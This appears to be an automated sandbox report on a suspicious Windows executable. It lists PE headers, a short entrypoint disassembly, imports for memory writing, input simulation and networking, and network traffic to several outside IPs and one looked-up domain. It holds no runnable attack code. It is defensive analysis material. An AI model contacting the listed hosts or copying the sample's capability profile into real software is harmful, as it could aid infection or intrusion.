                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6747B806 [Thu Nov 28 00:23:34 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:1
                                          File Version Major:5
                                          File Version Minor:1
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:1
                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                          Entrypoint Preview

                                          Instruction
                                          call 00007F0718BBA1FFh
                                          jmp 00007F0718BAD214h
                                          int3
                                          int3
                                          push edi
                                          push esi
                                          mov esi, dword ptr [esp+10h]
                                          mov ecx, dword ptr [esp+14h]
                                          mov edi, dword ptr [esp+0Ch]
                                          mov eax, ecx
                                          mov edx, ecx
                                          add eax, esi
                                          cmp edi, esi
                                          jbe 00007F0718BAD39Ah
                                          cmp edi, eax
                                          jc 00007F0718BAD6FEh
                                          bt dword ptr [004C0158h], 01h
                                          jnc 00007F0718BAD399h
                                          rep movsb
                                          jmp 00007F0718BAD6ACh
                                          cmp ecx, 00000080h
                                          jc 00007F0718BAD564h
                                          mov eax, edi
                                          xor eax, esi
                                          test eax, 0000000Fh
                                          jne 00007F0718BAD3A0h
                                          bt dword ptr [004BA370h], 01h
                                          jc 00007F0718BAD870h
                                          bt dword ptr [004C0158h], 00000000h
                                          jnc 00007F0718BAD53Dh
                                          test edi, 00000003h
                                          jne 00007F0718BAD54Eh
                                          test esi, 00000003h
                                          jne 00007F0718BAD52Dh
                                          bt edi, 02h
                                          jnc 00007F0718BAD39Fh
                                          mov eax, dword ptr [esi]
                                          sub ecx, 04h
                                          lea esi, dword ptr [esi+04h]
                                          mov dword ptr [edi], eax
                                          lea edi, dword ptr [edi+04h]
                                          bt edi, 03h
                                          jnc 00007F0718BAD3A3h
                                          movq xmm1, qword ptr [esi]
                                          sub ecx, 08h
                                          lea esi, dword ptr [esi+08h]
                                          movq qword ptr [edi], xmm1
                                          lea edi, dword ptr [edi+08h]
                                          test esi, 00000007h
                                          je 00007F0718BAD3F5h
                                          bt esi, 03h
                                          jnc 00007F0718BAD448h
                                          movdqa xmm1, dqword ptr [esi+00h]

                                          Rich Headers

                                          Programming Language:
                                          • [ C ] VS2008 SP1 build 30729
                                          • [IMP] VS2008 SP1 build 30729
                                          • [ASM] VS2012 UPD4 build 61030
                                          • [RES] VS2012 UPD4 build 61030
                                          • [LNK] VS2012 UPD4 build 61030

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x627b0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x6c4c.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0xc40000x627b00x62800f9ca3c094c45704b0f7ea5e4f275417bFalse0.9338019511421319data7.90575585682048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x1270000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                          RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                          RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                          RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                          RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                          RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                          RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                          RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                          RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                          RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                          RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                          RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                          RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                          RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                          RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                          RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                          RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                          RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                          RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                          RT_RCDATA0xcc7b80x59ab5data1.0003294444368815
                                          RT_GROUP_ICON0x1262700x76dataEnglishGreat Britain0.6610169491525424
                                          RT_GROUP_ICON0x1262e80x14dataEnglishGreat Britain1.25
                                          RT_GROUP_ICON0x1262fc0x14dataEnglishGreat Britain1.15
                                          RT_GROUP_ICON0x1263100x14dataEnglishGreat Britain1.25
                                          RT_VERSION0x1263240xdcdataEnglishGreat Britain0.6181818181818182
                                          RT_MANIFEST0x1264000x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                          Imports

                                          DLLImport
                                          WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                          COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                          PSAPI.DLLGetProcessMemoryInfo
                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                          USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                          UxTheme.dllIsThemeActive
                                          KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                          GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                          ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                          OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishGreat Britain

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 5, 2024 18:22:12.744544983 CET4970980192.168.2.83.33.130.190
                                          Dec 5, 2024 18:22:12.864360094 CET80497093.33.130.190192.168.2.8
                                          Dec 5, 2024 18:22:12.864444971 CET4970980192.168.2.83.33.130.190
                                          Dec 5, 2024 18:22:12.873578072 CET4970980192.168.2.83.33.130.190
                                          Dec 5, 2024 18:22:12.993447065 CET80497093.33.130.190192.168.2.8
                                          Dec 5, 2024 18:22:13.962656975 CET80497093.33.130.190192.168.2.8
                                          Dec 5, 2024 18:22:13.963264942 CET80497093.33.130.190192.168.2.8
                                          Dec 5, 2024 18:22:13.963447094 CET4970980192.168.2.83.33.130.190
                                          Dec 5, 2024 18:22:13.966891050 CET4970980192.168.2.83.33.130.190
                                          Dec 5, 2024 18:22:14.087563992 CET80497093.33.130.190192.168.2.8
                                          Dec 5, 2024 18:22:37.943238020 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:38.065814972 CET804974338.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:38.065906048 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:38.078440905 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:38.198843002 CET804974338.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:39.586735010 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:39.636781931 CET804974338.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:39.636842966 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:39.636914968 CET804974338.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:39.636965036 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:39.707138062 CET804974338.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:39.707197905 CET4974380192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:40.605120897 CET4974980192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:40.727535009 CET804974938.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:40.727700949 CET4974980192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:40.738253117 CET4974980192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:40.857970953 CET804974938.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:42.242875099 CET4974980192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:42.366065025 CET804974938.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:42.366142035 CET4974980192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:43.261409998 CET4975580192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:43.381355047 CET804975538.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:43.381453037 CET4975580192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:43.392133951 CET4975580192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:43.511833906 CET804975538.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:43.511924982 CET804975538.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:44.898994923 CET4975580192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:44.920101881 CET804975538.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:44.920233965 CET4975580192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:45.037763119 CET804975538.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:45.037908077 CET4975580192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:45.918663025 CET4976480192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:46.038434982 CET804976438.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:46.038525105 CET4976480192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:46.046241045 CET4976480192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:46.166115046 CET804976438.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:47.592560053 CET804976438.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:47.592606068 CET804976438.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:47.592794895 CET4976480192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:47.595541000 CET4976480192.168.2.838.47.232.196
                                          Dec 5, 2024 18:22:47.715307951 CET804976438.47.232.196192.168.2.8
                                          Dec 5, 2024 18:22:53.129635096 CET4978280192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:53.249465942 CET8049782217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:53.249624968 CET4978280192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:53.261367083 CET4978280192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:53.381774902 CET8049782217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:54.540719032 CET8049782217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:54.540790081 CET8049782217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:54.540847063 CET4978280192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:54.773952961 CET4978280192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:55.792968988 CET4978880192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:55.914436102 CET8049788217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:55.914556980 CET4978880192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:55.925795078 CET4978880192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:56.052500010 CET8049788217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:57.208271027 CET8049788217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:57.209103107 CET8049788217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:57.209162951 CET4978880192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:57.431601048 CET4978880192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:58.459650040 CET4979480192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:58.579472065 CET8049794217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:58.579679012 CET4979480192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:58.593518972 CET4979480192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:22:58.717166901 CET8049794217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:58.717233896 CET8049794217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:59.976537943 CET8049794217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:59.976583004 CET8049794217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:22:59.976771116 CET4979480192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:00.102082014 CET4979480192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:01.192743063 CET4980380192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:01.312685966 CET8049803217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:23:01.313591957 CET4980380192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:01.386142969 CET4980380192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:01.506004095 CET8049803217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:23:02.597970963 CET8049803217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:23:02.598225117 CET8049803217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:23:02.598393917 CET4980380192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:02.598866940 CET8049803217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:23:02.598952055 CET4980380192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:02.601430893 CET4980380192.168.2.8217.160.0.207
                                          Dec 5, 2024 18:23:02.721354961 CET8049803217.160.0.207192.168.2.8
                                          Dec 5, 2024 18:23:08.496809006 CET4982180192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:08.617969990 CET804982154.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:08.618253946 CET4982180192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:08.634721994 CET4982180192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:08.754565954 CET804982154.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:09.855412006 CET804982154.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:09.855600119 CET804982154.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:09.855680943 CET4982180192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:10.149017096 CET4982180192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:11.173520088 CET4982780192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:11.293329954 CET804982754.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:11.293642998 CET4982780192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:11.304506063 CET4982780192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:11.428427935 CET804982754.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:12.522968054 CET804982754.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:12.523040056 CET804982754.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:12.523653984 CET4982780192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:12.821546078 CET4982780192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:13.840888023 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:13.966423988 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:13.966511011 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:13.980938911 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:14.104768038 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:14.109380960 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:15.254499912 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:15.254581928 CET804983354.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:15.254776955 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:16.305237055 CET4983380192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.325550079 CET4984280192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.445327997 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:17.445638895 CET4984280192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.453905106 CET4984280192.168.2.854.67.87.110
                                          Dec 5, 2024 18:23:17.573842049 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:18.683528900 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:18.683613062 CET804984254.67.87.110192.168.2.8
                                          Dec 5, 2024 18:23:18.683712006 CET4984280192.168.2.854.67.87.110

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 5, 2024 18:22:12.287625074 CET5558653192.168.2.81.1.1.1
                                          Dec 5, 2024 18:22:12.737404108 CET53555861.1.1.1192.168.2.8
                                          Dec 5, 2024 18:22:29.078017950 CET5754053192.168.2.81.1.1.1
                                          Dec 5, 2024 18:22:29.299346924 CET53575401.1.1.1192.168.2.8
                                          Dec 5, 2024 18:22:37.418112040 CET6360353192.168.2.81.1.1.1
                                          Dec 5, 2024 18:22:37.940063000 CET53636031.1.1.1192.168.2.8
                                          Dec 5, 2024 18:22:52.605504990 CET5684053192.168.2.81.1.1.1
                                          Dec 5, 2024 18:22:53.127178907 CET53568401.1.1.1192.168.2.8
                                          Dec 5, 2024 18:23:07.606266022 CET6263253192.168.2.81.1.1.1
                                          Dec 5, 2024 18:23:08.494102001 CET53626321.1.1.1192.168.2.8

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 5, 2024 18:22:12.287625074 CET192.168.2.81.1.1.10xedc8Standard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
